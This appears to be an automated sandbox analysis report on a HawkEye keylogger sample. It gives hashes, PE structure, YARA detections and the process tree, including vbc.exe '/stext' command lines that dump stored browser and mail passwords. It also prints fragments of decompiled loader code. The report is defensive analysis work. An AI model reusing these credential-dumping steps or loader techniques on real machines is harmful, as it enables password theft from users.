Preview:	[.I.n.t.e.r.n.e.t.S.h.o.r.t.c.u.t.]...U.R.L.=.f.i.l.e.:./././.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.e.z.o.c.x.c.v.g.g.g.\.x.j.y.x.i.b.e.i.f.b.d.m.o.c.k...e.x.e.

C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe Download File
Process:	C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	686593
Entropy (8bit):	7.284334525538713
Encrypted:	false
SSDEEP:	12288:3oNmzNhvQsYo9skrJouKDudlPRhirRCb8yyWHpd8Z8WQdQScE+G41AFQixYmw8Yw:4NWNhxi6JoDkirQHLC
MD5:	C0962CFBB4BB43348708437D8CD1D8EF
SHA1:	B726A0128783D7C503890C564A094A997095B2DE
SHA-256:	58B4B3850B7B808CC7C1370A5B42324E2624C137DDC15E24C39FAB2D4B60DE4E
SHA-512:	90F2E67C73F983BCBD941E09A0319241758BE5F0C64B0F4D4E6791275D966C18A75132ED3C0C5C74B12D5CE7CF70FB2313D8F8D64293D4E3FB1B5B065938BA47
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.0...^...^...^......^....^......^.).]...^.).[...^.).Z...^.......^..._.H.^..Z...^.....^.......^..\...^.Rich..^.........................PE..L....Ss\..........................................@.......................................@..................................k..(.......q............................d...............................d..@............................................text............................... ..`.rdata...a.......b..................@..@.data....m.......d...X..............@....gfids..............................@..@.rsrc...q...........................@..@.reloc...............j..............@..B................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.284337932398097
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	b15023b1855da1cf5213b061dc626cc2.exe
File size:	686592
MD5:	ac5eb6172c287cbb954954b56586653f
SHA1:	3bb19910b89a39274957959dec593964bcf12ee4
SHA256:	da23b9268823cc4bcc82fdc74b6bd9c5d8493347507f111de7c387cbe215b264
SHA512:	55f33dc500a7c5ebac4efe9cc8399ec638afe6f9306cb18779825b7b82b5926a5c14f8f04ef8e9967640b3ea810dcf13587c9c15c064ab79ea1719e74620da89
SSDEEP:	12288:3oNmzNhvQsYo9skrJouKDudlPRhirRCb8yyWHpd8Z8WQdQScE+G41AFQixYmw8Yw:4NWNhxi6JoDkirQHLC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.0...^...^...^.......^.......^.......^.).]...^.).[...^.).Z...^.......^..._.H.^...Z...^.......^.......^...\...^.Rich..^........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4013b4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp:	0x5C7353AD [Mon Feb 25 02:32:13 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	90e4fdc68b40f6ba9c12d9eb0cf8a434

Entrypoint Preview

Instruction
call 00007FDF0CB710BFh
jmp 00007FDF0CB70CC3h
push ebp
push esp
pop ebp
mov eax, dword ptr [0041DC28h]
and eax, 1Fh
push 00000020h
pop ecx
sub ecx, eax
mov eax, dword ptr [ebp+08h]
ror eax, cl
xor eax, dword ptr [0041DC28h]
pop ebp
ret
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007FDF0CB70E4Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007FDF0CB70E3Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007FDF0CB70E3Eh
add edx, 28h
cmp edx, esi
jne 00007FDF0CB70E1Ch
xor eax, eax
pop esi
pop ebp
ret
push edx
pop eax
jmp 00007FDF0CB70E2Bh
call 00007FDF0CB71566h
or eax, eax
jne 00007FDF0CB70E35h
xor al, al
ret
mov eax, dword ptr fs:[00000018h]
push esi
mov esi, 0041E3B8h
mov edx, dword ptr [eax+04h]
jmp 00007FDF0CB70E36h
cmp edx, eax
je 00007FDF0CB70E42h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
or eax, eax
jne 00007FDF0CB70E22h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
push esp
pop ebp
cmp dword ptr [ebp+08h], 00000000h
jne 00007FDF0CB70E39h
mov byte ptr [0041E3D4h], 00000001h
call 00007FDF0CB71387h
call 00007FDF0CB7180Dh
test al, al
jne 00007FDF0CB70E36h
xor al, al
pop ebp
ret
call 00007FDF0CB7459Ch

Rich Headers

Programming Language:

[LNK] VS2015 UPD3.1 build 24215
[ C ] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x16bc4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x8aa71	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xab000	0xea0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x164c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x164e0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf084	0xf200	False	0.603305785124	data	6.68957843183	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x6182	0x6200	False	0.488839285714	data	5.26425207809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x18000	0x6de4	0x6400	False	0.7000390625	data	7.02752055826	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids	0x1f000	0xac	0x200	False	0.271484375	data	1.40771783792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x8aa71	0x8ac00	False	0.654043496622	data	7.15231003865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xab000	0xea0	0x1000	False	0.75732421875	data	6.27766449099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_RCDATA	0x2013c	0x8a400	data
RT_RCDATA	0xaa53c	0xf0	ASCII text, with no line terminators
RT_VERSION	0xaa62c	0x2c8	data	English	United States
RT_MANIFEST	0xaa8f4	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, CloseHandle, LCMapStringW, GetFileType, SetFilePointerEx, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, GetProcessHeap, FlushFileBuffers, GetConsoleCP, GetConsoleMode, HeapSize, HeapReAlloc, WriteConsoleW, CreateFileW, DecodePointer, RaiseException

Version Infos

Description	Data
LegalCopyright	Copyright (C) Scanderbeg 2018
InternalName	biosterin.exe
FileVersion	8.6.1.1
CompanyName	supertension
ProductName	tend
ProductVersion	4.4.2.6
FileDescription	generously
OriginalFilename	Skivvies.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432 Parent PID: 5940

General

Start time:	12:03:16
Start date:	19/11/2020
Path:	C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe'
Imagebase:	0xa30000
File size:	686592 bytes
MD5 hash:	AC5EB6172C287CBB954954B56586653F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, Author: Joe Security Rule: HawkEyev9, Description: HawkEye v9 Payload, Source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, Author: ditekshen
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6476 Parent PID: 6432

General

Start time:	12:03:24
Start date:	19/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe'
Imagebase:	0xdd0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.608241206.00000000035AF000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.609395469.0000000006F61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.609395469.0000000006F61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.606262904.0000000003472000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000003.361093839.0000000004C23000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000003.361093839.0000000004C23000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 6576 Parent PID: 6476

General

Start time:	12:03:28
Start date:	19/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp992B.tmp'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: xjyxibeifbdmock.exe PID: 6828 Parent PID: 3440

General

Start time:	12:03:35
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe'
Imagebase:	0x150000
File size:	686593 bytes
MD5 hash:	C0962CFBB4BB43348708437D8CD1D8EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, Author: Joe Security Rule: HawkEyev9, Description: HawkEye v9 Payload, Source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, Author: ditekshen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6852 Parent PID: 6828

General

Start time:	12:03:42
Start date:	19/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe'
Imagebase:	0x720000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.606139905.0000000002DD2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.608017137.0000000002F0D000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000003.397841054.0000000004583000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000003.397841054.0000000004583000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.609144823.00000000068B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.609144823.00000000068B1000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 6948 Parent PID: 6852

General

Start time:	12:03:45
Start date:	19/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpDC10.tmp'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 6280 Parent PID: 6476

General

Start time:	12:04:32
Start date:	19/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp92CE.tmp'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000000D.00000002.502433502.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.502433502.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 3252 Parent PID: 6852

General

Start time:	12:04:49
Start date:	19/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD611.tmp'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432 Parent PID: 5940 b15023b1855da1cf5213b061dc626cc2.exeCOMMON

Executed Functions

Function 00A31000, Relevance: 5.0, Strings: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00A31000(void* __edi, void* __eflags) {
				char _v6;
				short _v8;
				char _v32;
				short _t4;
				char _t5;
				intOrPtr* _t6;
				void* _t13;

				asm("movups xmm0, [0xa41188]");
				_t4 =  *0xa411a0; // 0x444b
				_v8 = _t4;
				_t5 =  *0xa411a2; // 0x0
				asm("movups [ebp-0x1c], xmm0");
				asm("movq xmm0, [0xa41198]");
				asm("movq [ebp-0xc], xmm0");
				_v6 = _t5;
				_t6 = E00A32607(_t13, __edi, 0x173a825e); // executed
				if(_t6 != 0) {
					 *_t6 = 0xdddd;
					if(_t6 + 8 != 0) {
						asm("pminsw xmm0, xmm1");
						E00A31090(0xa48000, 0x5c05, "181636863591611886391814640", 0x1c); // executed
						 *0xa48000("SOWQKFT", "BGBAQFXQZ",  &_v32, 1); // executed
					}
				}
				return 0;
			}

0x00a31006
0x00a3100d
0x00a31013
0x00a31017
0x00a3101c
0x00a31025
0x00a3102d
0x00a31032
0x00a31035
0x00a3103f
0x00a31041
0x00a3104a
0x00a3104c
0x00a31061
0x00a3107b
0x00a3107d
0x00a3104a
0x00a31085

Strings

BGBAQFXQZ, xrefs: 00A3106C
181636863591611886391814640, xrefs: 00A31052
SOWQKFT, xrefs: 00A31071
YRJZEBUMJGCHNLQXOPKKQWDOKD, xrefs: 00A31006

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 181636863591611886391814640$BGBAQFXQZ$SOWQKFT$YRJZEBUMJGCHNLQXOPKKQWDOKD
API String ID: 0-987984630
Opcode ID: 014b3e5e7e367280e7a8c5ae11d42a3e8ce069c9d7de8e580f988e278f9e4450
Instruction ID: fb909363d575cbc55168ef96c17c4f8c1a4d499cc15e6ae32c0e27256f84d38f
Opcode Fuzzy Hash: 014b3e5e7e367280e7a8c5ae11d42a3e8ce069c9d7de8e580f988e278f9e4450
Instruction Fuzzy Hash: 6DF0F42CE84348A5E701A7E89D03BB97760AF97340F048349FA18A2292F7A655C18761

Uniqueness

Uniqueness Score: -1.00%

Function 00A318A3, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A318A3() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00A318AF); // executed
				return _t1;
			}

0x00a318a8
0x00a318ae

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_000018AF,00A3123F), ref: 00A318A8

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 44c4d7ae2d809b9df3380eb3235f3cfb9b950ebaf6fa9ac33d2306353874bee4
Instruction ID: faa7a07db31e58330ffe35400feb93e5694c1cde0542b494a10fccdfd8e6948a
Opcode Fuzzy Hash: 44c4d7ae2d809b9df3380eb3235f3cfb9b950ebaf6fa9ac33d2306353874bee4
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D2E5, Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 212librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,CallWindowProcW,00003000,LoadLibraryW), ref: 00A4D443
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 00A4D483
LoadLibraryW.KERNELBASE(00000004,00003000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 00A4D4A5

Strings

CallWindowProcW, xrefs: 00A4D43B, 00A4D43E
VirtualFree, xrefs: 00A4D44F, 00A4D452
VirtualAlloc, xrefs: 00A4D45F, 00A4D462
LoadLibraryW, xrefs: 00A4D42B, 00A4D42E

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AllocVirtual
String ID: CallWindowProcW$LoadLibraryW$VirtualAlloc$VirtualFree
API String ID: 2458631311-840194956
Opcode ID: 68b6c466073c91d79cb371cc8d60e45755da7240ae76d72352d3ace4da18c246
Instruction ID: 5d09233438e8c0411366d7732121073b586922eafc77ce56ec4c250a9d05af22
Opcode Fuzzy Hash: 68b6c466073c91d79cb371cc8d60e45755da7240ae76d72352d3ace4da18c246
Instruction Fuzzy Hash: 9BA14B30D082C8DAEB11CBE8C448BEDBFB2AF65708F144099E5847F386D7BA5554CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A5E6, Relevance: 12.2, APIs: 8, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00A3A5E6(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* __esp;
				signed int _t49;
				signed int _t54;
				void* _t55;
				int _t58;
				signed int _t61;
				short* _t63;
				signed int _t67;
				short* _t69;
				short* _t71;
				void* _t79;
				short* _t82;
				short* _t83;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t98;
				int _t100;
				int _t102;
				short* _t103;
				int _t107;
				int _t109;
				signed int _t110;
				short* _t111;
				void* _t114;

				_pop(_t110);
				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xa4dc28; // 0x4f268f78
				 *(_t110 - 4) = _t49 ^ _t110;
				_push(__esi);
				_push(__edi);
				_t107 =  *(_t110 + 0x18);
				if(_t107 > 0) {
					_t79 = E00A3CE86( *(_t110 + 0x14), _t107);
					_t114 = _t79 - _t107;
					_t4 = _t79 + 1; // 0x1
					_t107 = _t4;
					if(_t114 >= 0) {
						_t107 = _t79;
					}
				}
				_t100 =  *(_t110 + 0x24);
				if(_t100 == 0) {
					_t100 =  *( *((intOrPtr*)( *((intOrPtr*)(_t110 + 8)))) + 8);
					 *(_t110 + 0x24) = _t100;
				}
				_t54 = MultiByteToWideChar(_t100, 1 + (0 |  *((intOrPtr*)(_t110 + 0x28)) != 0x00000000) * 8,  *(_t110 + 0x14), _t107, 0, 0);
				 *(_t110 - 8) = _t54;
				if(_t54 == 0) {
					L38:
					_t55 = E00A31B61( *(_t110 - 4) ^ _t110);
					_push(_t110);
					return _t55;
				} else {
					_t97 = _t54 + _t54;
					_t87 = _t97 + 8;
					asm("sbb eax, eax");
					if((_t97 + 0x00000008 & _t54) == 0) {
						_t82 = 0;
						__eflags = 0;
						L14:
						if(_t82 == 0) {
							L36:
							_t109 = 0;
							L37:
							E00A38AE5(_t82);
							_push(_t109);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t100, 1,  *(_t110 + 0x14), _t107, _t82,  *(_t110 - 8));
						_t125 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t102 =  *(_t110 - 8);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(_t102);
						_push(_t82);
